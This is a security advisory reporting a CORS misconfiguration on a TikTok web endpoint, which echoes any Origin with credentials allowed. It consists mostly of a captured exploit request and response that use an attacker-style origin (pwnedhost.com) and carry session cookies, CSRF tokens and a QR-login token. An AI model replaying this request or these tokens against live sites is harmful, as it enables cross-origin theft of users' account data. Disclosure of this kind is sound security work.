## Title: TikTok - web app CORS Vulnerability
## Author: nu11secur1ty
## Date: 12/21/2024
## Vendor: https://www.tiktok.com/
## Software: https://www.tiktok.com/
## Reference: https://portswigger.net/web-security/cors
## Description:
The application implements an HTML5 cross-origin resource sharing (CORS) policy for this request that allows access from any domain: the value of the Origin request header is reflected verbatim in the Access-Control-Allow-Origin response header, and the response also sets Access-Control-Allow-Credentials: true. The application allowed access from the requested origin https://pwnedhost.com/PoC/Technical%20Details_%20Falcon%20Update%20for%20Windows%20Hosts%20_%20CrowdStrike.html (note that this value is not even a well-formed origin, which is scheme://host[:port] with no path; it was echoed back unchanged, so no validation of the Origin header is taking place). Since the Vary: Origin header was not present in the response, reverse proxies and intermediate servers may cache it, which may enable an attacker to carry out cache poisoning attacks; the response shown below does carry Cache-Control: max-age=0, no-cache, no-store, so this secondary issue only applies to intermediaries that do not honour those directives.
An HTML5 cross-origin resource sharing (CORS) policy controls whether and how content running on other domains can perform two-way interaction with the domain that publishes the policy. The policy is fine-grained and can apply access controls per-request based on the URL and other features of the request.
Trusting arbitrary origins effectively disables the same-origin policy, allowing two-way interaction by third-party web sites. Unless the response consists only of unprotected public content, this policy is likely to present a security risk.
If the site specifies the header Access-Control-Allow-Credentials: true, as it does here, third-party sites may be able to carry out privileged actions and retrieve sensitive information with the victim's cookies attached. Even if it does not, attackers may be able to bypass any IP-based access controls by proxying through users' browsers.
STATUS: HIGH Vulnerability
[+]Exploit:
- CORS:
```http
POST /shorten/?WebIdLastTime=1734674578&aid=1988&app_language=en&app_name=tiktok_web&browser_language=en-US&browser_name=Mozilla&browser_online=true&browser_platform=Win32&browser_version=5.0%20%28Windows%20NT%2010.0%3B%20Win64%3B%20x64%29%20AppleWebKit%2F537.36%20%28KHTML%2C%20like%20Gecko%29%20Chrome%2F131.0.6778.140%20Safari%2F537.36&channel=tiktok_web&cookie_enabled=true&data_collection_enabled=false&device_id=7450370510314489376&device_platform=web_pc&focus_state=true&from_page=search&history_len=2&is_fullscreen=false&is_page_visible=true&odinId=7450370536233960481&os=windows&priority_region=&referer=®ion=BG&safe_token=true&screen_height=600&screen_width=800&tz_name=Europe%2FSofia&user_is_login=false&verifyFp=verify_m4wcgihp_LflsP3hp_6eMu_4s8v_9mIZ_13upefT6rIq8&webcast_language=en&msToken=RJ5N3lhi7vT0mXtG-Kqn1AwCeKUgB1t80x375zpJDSBWsJ8TqPyM1XKHKIa8DS4Hrahj-bHIY4e5EFyBIaeafYPvmyO7X-o87t7PSpc-ZgymSc-p9vFpKQNN8SU=&X-Bogus=DFSzswfOX11GFESst0Z8C41WyZnr&_signature=_02B4Z6wo00001M7APrQAAIDCL8DdtOrvfWTOwGoAAFTa71 HTTP/2
Host: www.tiktok.com
Accept-Encoding: gzip, deflate, br
Accept: */*
Accept-Language: en-US;q=0.9,en;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.6778.140 Safari/537.36
Cache-Control: max-age=0
Cookie: tt_csrf_token=MqzImxWz-uowm0jbGgvmcsBXSNsptjmz0psg; tt_chain_token=IjugFJXqyVjt+nCwUTDnKQ==; ak_bmsc=8C95CD36291DB4E2FB7FE462CACB988F~000000000000000000000000000000~YAAQDsUTAqVHCuGTAQAA+Ny95Rq1tx9Fq1jZGANl2Q3mnz22KxaDvHh9DG69TvkGZc+kyxWsMX673oZb+VPTz/7dO1MdwqOoI0duH0Xz91UsWY+ar5Hn9N34X7Sh+TYk4GRK3atnOFRWzGSKVW+xt/06bX4EsDb0212ontoHNHSCyTkJImig0u9a5T/sS6vh/0/VkjKvXrQOg0Hg8lkwowo6ESiJuZpLCGBCKibKorTgH18+qtJtyCbxkYKu3Kyr++vSlDhNEYrXF1Ta8TGfZXLG9LB3T4KGkHIaAw7woaGfUoitb1ggAAO82RVFiEc5gFm8YJKXm37505rgRRs7MR1Sd5Zf0yvcPH3iNbdAZGtL11TpmeEoZcIH+3yfAbpVTsNNbSyLYD1wDg==; delay_guest_mode_vid=3; tiktok_webapp_theme_source=system; tiktok_webapp_theme=light; ttwid=1%7CTA8TJR-FyN1FZWCT5DkEsU8m27S8VrtpSuTHRZ_uqf0%7C1734726251%7C59a1d474f0957eb88bbe2d1f85670ad3de5181c01468ee9b18bddc6dd5bee8bf; s_v_web_id=verify_m4wcgihp_LflsP3hp_6eMu_4s8v_9mIZ_13upefT6rIq8; passport_csrf_token=a3dfb2da343f40bb940a20239a8f58ab; passport_csrf_token_default=618d6ad984e98717d2cf671394161c16; msToken=eoNkSmSAUNr5sKzmU1ak8ESN6olpUJ3H-ZLw4l1V8VD-RivpopFX94wqiCZXZTJvKII9IqAAV6xFzfpPEXM3SKsOtbUTPWWQVhwb6P2ToijQ; msToken=RJ5N3lhi7vT0mXtG-Kqn1AwCeKUgB1t80x375zpJDSBWsJ8TqPyM1XKHKIa8DS4Hrahj-bHIY4e5EFyBIaeafYPvmyO7X-o87t7PSpc-ZgymSc-p9vFpKQNN8SU=
Origin: https://pwnedhost.com/PoC/Technical%20Details_%20Falcon%20Update%20for%20Windows%20Hosts%20_%20CrowdStrike.html
Referer: https://www.tiktok.com/search/video?%2f
X-Mssdk-Info: 8zhnTgv3iyvt9eA5NESOuvYvQp0BrKItxe4g1p5mheqMlFEguxzf4zaZzMVn05R.gecfwOWMk93efqnaTsLad4lFvT0dmfP0RdkMBQAM8ScrulN39Y-PbMjyTAHnpz2vDcuChDrTtxtAvIokkilI-J2uubETrXil02p7WrTTm7YCGl67b9v-Yw2ybSDXLNKbb8oaNp9pjhzHUXfHSaOccKh4cAR12KDueYJ7MTeWXZukV-U4gkRk1hPT9S-NhfDfjnpc4HgdCuFP3U9LdDs4PbxkN4lpSSPvApzDl9qoNpGURVP0TmGtl73nYXKDuy5Qtu7qlJiWLK6PWNsAuTphUwZWs0nKWQ.BQwKPtkPwSBXKWClv5GY-7FSAsdYapEUZosU8A0wtj5o.Z2YvBrzXme9-WvWXh48WRdqRd.Lg45am.bNK-xz9nNQ0TqmcK-U4ZLk8MO3EWWbtQGCiIsF.jdzfn-MUchyG9ZXgtsbHsKZy-gxvX8fnihiFEx4pRUpBqaVGH4s-Lc.pmEuqG8rCgqxlSALPcncfsaxMbh0UvwgeplxT.7it2fvs.6lRoMMKnVKTOlHpcjIBQwXDcclccbhT-VeBzi4Re9KoEmEf1-HR2vA3qhdFCEZ1OzG.QTHV0t3PNDmTLufih6Htvi-wmJ3sR8swCTUHW5gdxxIZ8jvawRV5pS283Pe.ArUc0i6aCvZsBmalQ0V6WANWFB5AQUoguS-5vKuqc4dcaGG-T8rNnHRxyU6KNA9DPSEd93FurAZL3YRzCM-vOjoUuxWXN2B9MqIqMgDAlYvdzl596hlM5jksL.KPmybOAV-ZZhDYhvJHxQzZzVc3KraM1HCOtfkeZjJhFQ5traPYeCQCo.aLuZFfjNLgZ8c6YCxovo2d9urYMGND5UGO4Gp1bdobJoBp59WfMwGCEt4Z48Mu.30L7h8.yd01pin79QOv-B3Kw01mPR7p2Wgj7Ku6T49PqK0Ot8XEE5dNZH3kPQIhWPUpXk8QCmninOcdJXs.PryfEKs71vIfDUk6PkUz9o2TBipSOd0g07iRXcL0Gjjtyy20J2voDpiFF-.j4GxRrBCCOOtOVn2ditFkQjzRtxytlIj94oifaKoo92vFYOyYtr8tCmqQYg2W3rh4VO8fbJs4f2hrWhDfk4neualoQoRTRmaR4FQCbr56Aj1h6kqxR5T.zJmKjLAEuRGrTI35luNdcPUL3ev500vtJKnytLZ8qKreuNCXEdbkvIt66NTgSqS.3M57o0vzPwqzJVscP0I.0lbi1VxLrDgOib99Rh0SVGfCzyNwZDcoHQUrnySqRKZK2wHXbY15As8Mn9K-ufTb8Bm4EtuWhCNTtx3wKTo0lgFFsuah-tswYEsqHATbEeAGv7DAwC-4Qsk-OYaD0NzIsZ3grsLrS49zHKkg615NTr.G8NeMOQkVEFTDlo9tMvOw50R3utrybtWQl71V1sTirND5IZCPKypUholxTs5OBqvzx7mjU4Xl9FnFcFeRpotDh7SnBYnz4WeajwHsKiE3rxp9xKEdjTgF6emlZpVqAj-GT.SxuVOmEEHOWLDPj.c6lyIHVphIof2U8BXqkYbwf8BPIKwXbubxzS1rBfmfpwzA5BSlOlEv0FCPOm.WGrrvq8U-YsFJfbJsVZeWM-QNxJzSzw3Jg-PlDHbZ2swrFMv.sOwZxHVEaa02Rf06Zmx9ASzGHSo.imY8X1y1gNpesgUVmVdlUTVSa0T-TssjivJxqZ3YcTC3C3-q4nNKoIWefNpEzR6Q6UhKwJc6QK5-JZOLAJ.jUKteX7qlJe2sFJ7npQywKk515m6w73P1SM6FGFO2mCb4wtRpC.OfRon-ycPePPAlW8SAOP-4cEa.u75Pie89reGjeRLH2gpRov6URPpdynPOJGq5PB3VKAA-yblOLlcrcZ-FgJDs..8wnzSqHQzxWl3O-Tlb3vghISjLaL03muhgFp6aUxSqJD6gYr
ajS0KPw7vKZOzKIWiyq3Hz.GJjfJsDBLLSTY0w9W-CFUaGXn2p7ikVbj9GFml.W-qpMUN7Q67A0qMHaF0t9LA4tQ5RkhcbN1OeRkCPVuWQMc-g2.oQc0REg4zgF7D1BlXdM3wRWYjdTHjR4MrLRe6j65mt7GayMI9MDv0JgECRAJQSHOjD-qrg0Uv1FcEjGgMjfEw7xkEx4TsNtuN9lxIZ8XXuMokF1b5CIiKEUBlrjt1TJrL3BEIbIBu45wNaqG1trpxa3R5CMNXE22SpfRezo1a7Igit1dMzh1QlFl.JA6HhiFjIwEhqS5mLwQMVm1oCdM5ViXvUNTzRr6teM77XeE0Gt3WxyT3M.y57udTkhwjx4.zitxb44Z2PMHwQLZbpTBhfBKQ3DO3yD4.fJZWeEe6SykT0FqtlcZgg1ubGQcG.1hXWlJ.LtFueaLrqcKNvSDDihMIetQCoqSMMVGyye8Gjqw7oHmv5tQH7jxf7t0a8di1hR.bWSp4zPMCxMerGoNJE0zcT5vviq8cqnw89XySfy1AkHs1ekJin29jO3Iievsgs1GM0f12gdCeoANg7SJPe-clu4e3InO7oGdmiq.4U2E-RhdUqxJ0JLdJqFsYB7rTXFZFL7fZaMBPhls8dTLlV.xZEiA-.HwacYA57-8h-Rwe5i8ywo4-wUdRSoe0oHj27wEZUm4XxVU16KIeOkHcsZLCMuvwe.qFc3TANgOSjjkeMo.gOHK6DHJQAz2CAcVbtTmiMoPC.QHrMUvTdsuj0yDC4BQBpuSeP.Kh5QdbJdLuLejp1BQB47tW48JU8VOWNTs-T.dGmpesMZKumlFayAWOkpFPAF99g8aw387tVJkbE1OZ8lhHYov49o9VppXscKSs9V9zlIta--2Ol6IzWJBQ4AaZMW6.LHVKVODrtvy7Ft6OusF70rPHLT1yKaWXUVv3Ce.fpEMIYP9yG.UDWwiAfywajsCOB803t4sCre8MA01H39s-9GmRWPG.GMAQDxf13lC6FiwrsqF0p6LODz1Ky4WuK95b-6sid-xz9Bm3shzuVeagQajrr0Yy8EqDtHocIv3AKWBl.1TpXdXcHbDyEUhz-Sp6pwKGZe8sOqc2c7-0VLaso-IaCOJBUUojHysK8BilHu8HLcv1Se1Eoesg9JBK18KZKBMZdcp4UlgX9Kk9DwLssOB6EBXp8uosFbw.vgzKyCe2jVGl1keHUdI5QFzCulk.jl02RSG8Lcjt9QTq7WgyVGLW36DKI8g17ukuv1m5Pb-216eksZU.1k7AJTW5toks4QmIkFhUICH9llkidT0jIqRvlnuKn1Ow2S63JpL0yvUnbsvUsNq-BCJPlqutmTJKNcog1jHN-Bm7Nb9p5JzEa9BTAayt1U3vlql62qq6aCbMLc-Jj
Content-Type: application/x-www-form-urlencoded
Sec-Ch-Ua: ".Not/A)Brand";v="99", "Google Chrome";v="131", "Chromium";v="131"
Sec-Ch-Ua-Platform: Windows
Sec-Ch-Ua-Mobile: ?0
Content-Length: 411

belong=tiktok-webapp-qrcode&persist=0&expired_time=3600&targets=https%3A%2F%2Fwww.tiktok.com%2Fpassport%2Fweb%2Fscan_index%2F%3Faid%3D1459%26append_common_params%3D1%26hide_nav_bar%3D1%26qr_source_aid%3D1459%26token%3DNdWvyBbpIg2ytsdp2-bJDxl7ReAe6hUXLkGJpzYxa5c%253D_useast2a%26app_type%3Dm%26next_url%3Dhttps%253A%252F%252Fwww.tiktok.com%252Fpassport%252Fweb%252Fscan_qrcode%252F%253Fclient_secret%253DQ189U88U
```
[+]Response:
```http
HTTP/2 200 OK
Content-Type: application/json; charset=utf-8
Access-Control-Allow-Credentials: true
Access-Control-Allow-Headers: Content-Type, Content-Length, Accept-Encoding, X-CSRF-Token, Authorization, accept, origin, Cache-Control, X-Requested-With,X-Nt-Engine
Access-Control-Allow-Methods: POST, OPTIONS, GET, PUT
Access-Control-Allow-Origin: https://pwnedhost.com/PoC/Technical%20Details_%20Falcon%20Update%20for%20Windows%20Hosts%20_%20CrowdStrike.html
X-Tt-Logid: 20241221060429F9F8B4FFA7AE546D2363
Server-Timing: inner; dur=12
X-Tt-Trace-Host: 018a039aebf9124d02d13f22efc360bc65d6d4ff7a7143382da6889adba7aecf9d528e657111c633b0e32784a68960a93e2cb1034cdd29c7e9a837e07db7332d33cebcd34c52721018214f1e06d01a4394706941a53a8d83381b594303bd0ec12e
X-Tt-Trace-Id: 00-241221060429F9F8B4FFA7AE546D2363-16B3F94E0A83DD67-00
Server: TLB
Expires: Sat, 21 Dec 2024 06:04:30 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sat, 21 Dec 2024 06:04:30 GMT
Content-Length: 464
X-Cache: TCP_MISS from a2-23-154-110.deploy.akamaitechnologies.com (AkamaiGHost/11.7.2.1-9611f29bef89eba7b18045b10aa2af98) (-)
X-Tt-Trace-Tag: id=16;cdn-cache=miss;type=dyn
Server-Timing: cdn-cache; desc=MISS, edge; dur=9, origin; dur=118
X-Origin-Response-Time: 118,2.23.154.110
X-Akamai-Request-Id: 4db276c

{"code":0,"message":"success","now":1734761070,"data":[{"status":"success","target":"https://www.tiktok.com/passport/web/scan_index/?aid=1459\u0026append_common_params=1\u0026hide_nav_bar=1\u0026qr_source_aid=1459\u0026token=NdWvyBbpIg2ytsdp2-bJDxl7ReAe6hUXLkGJpzYxa5c%3D_useast2a\u0026app_type=m\u0026next_url=https%3A%2F%2Fwww.tiktok.com%2Fpassport%2Fweb%2Fscan_qrcode%2F%3Fclient_secret%3DQ189U88U","short_url":"https://www.tiktok.com/t/ZGHy7NaaKEWMj-hD6xC/"}]}
```
## Reproduce:
[href](https://www.patreon.com/posts/tiktok-cors-0-118402299)
## Info:
[href](https://portswigger.net/web-security/cors)
## Time spent:
12:07:00
--
System Administrator - Infrastructure Engineer
Penetration Testing Engineer
Exploit developer at https://packetstormsecurity.com/ https://cve.mitre.org/index.html
https://cxsecurity.com/ and https://www.exploit-db.com/
0day Exploit DataBase https://0day.today/
home page: https://www.nu11secur1ty.com/
hiPEnIMR0v7QCo/+SEH9gBclAAYWGnPoBIQ75sCj60E=
nu11secur1ty <http://nu11secur1ty.com/>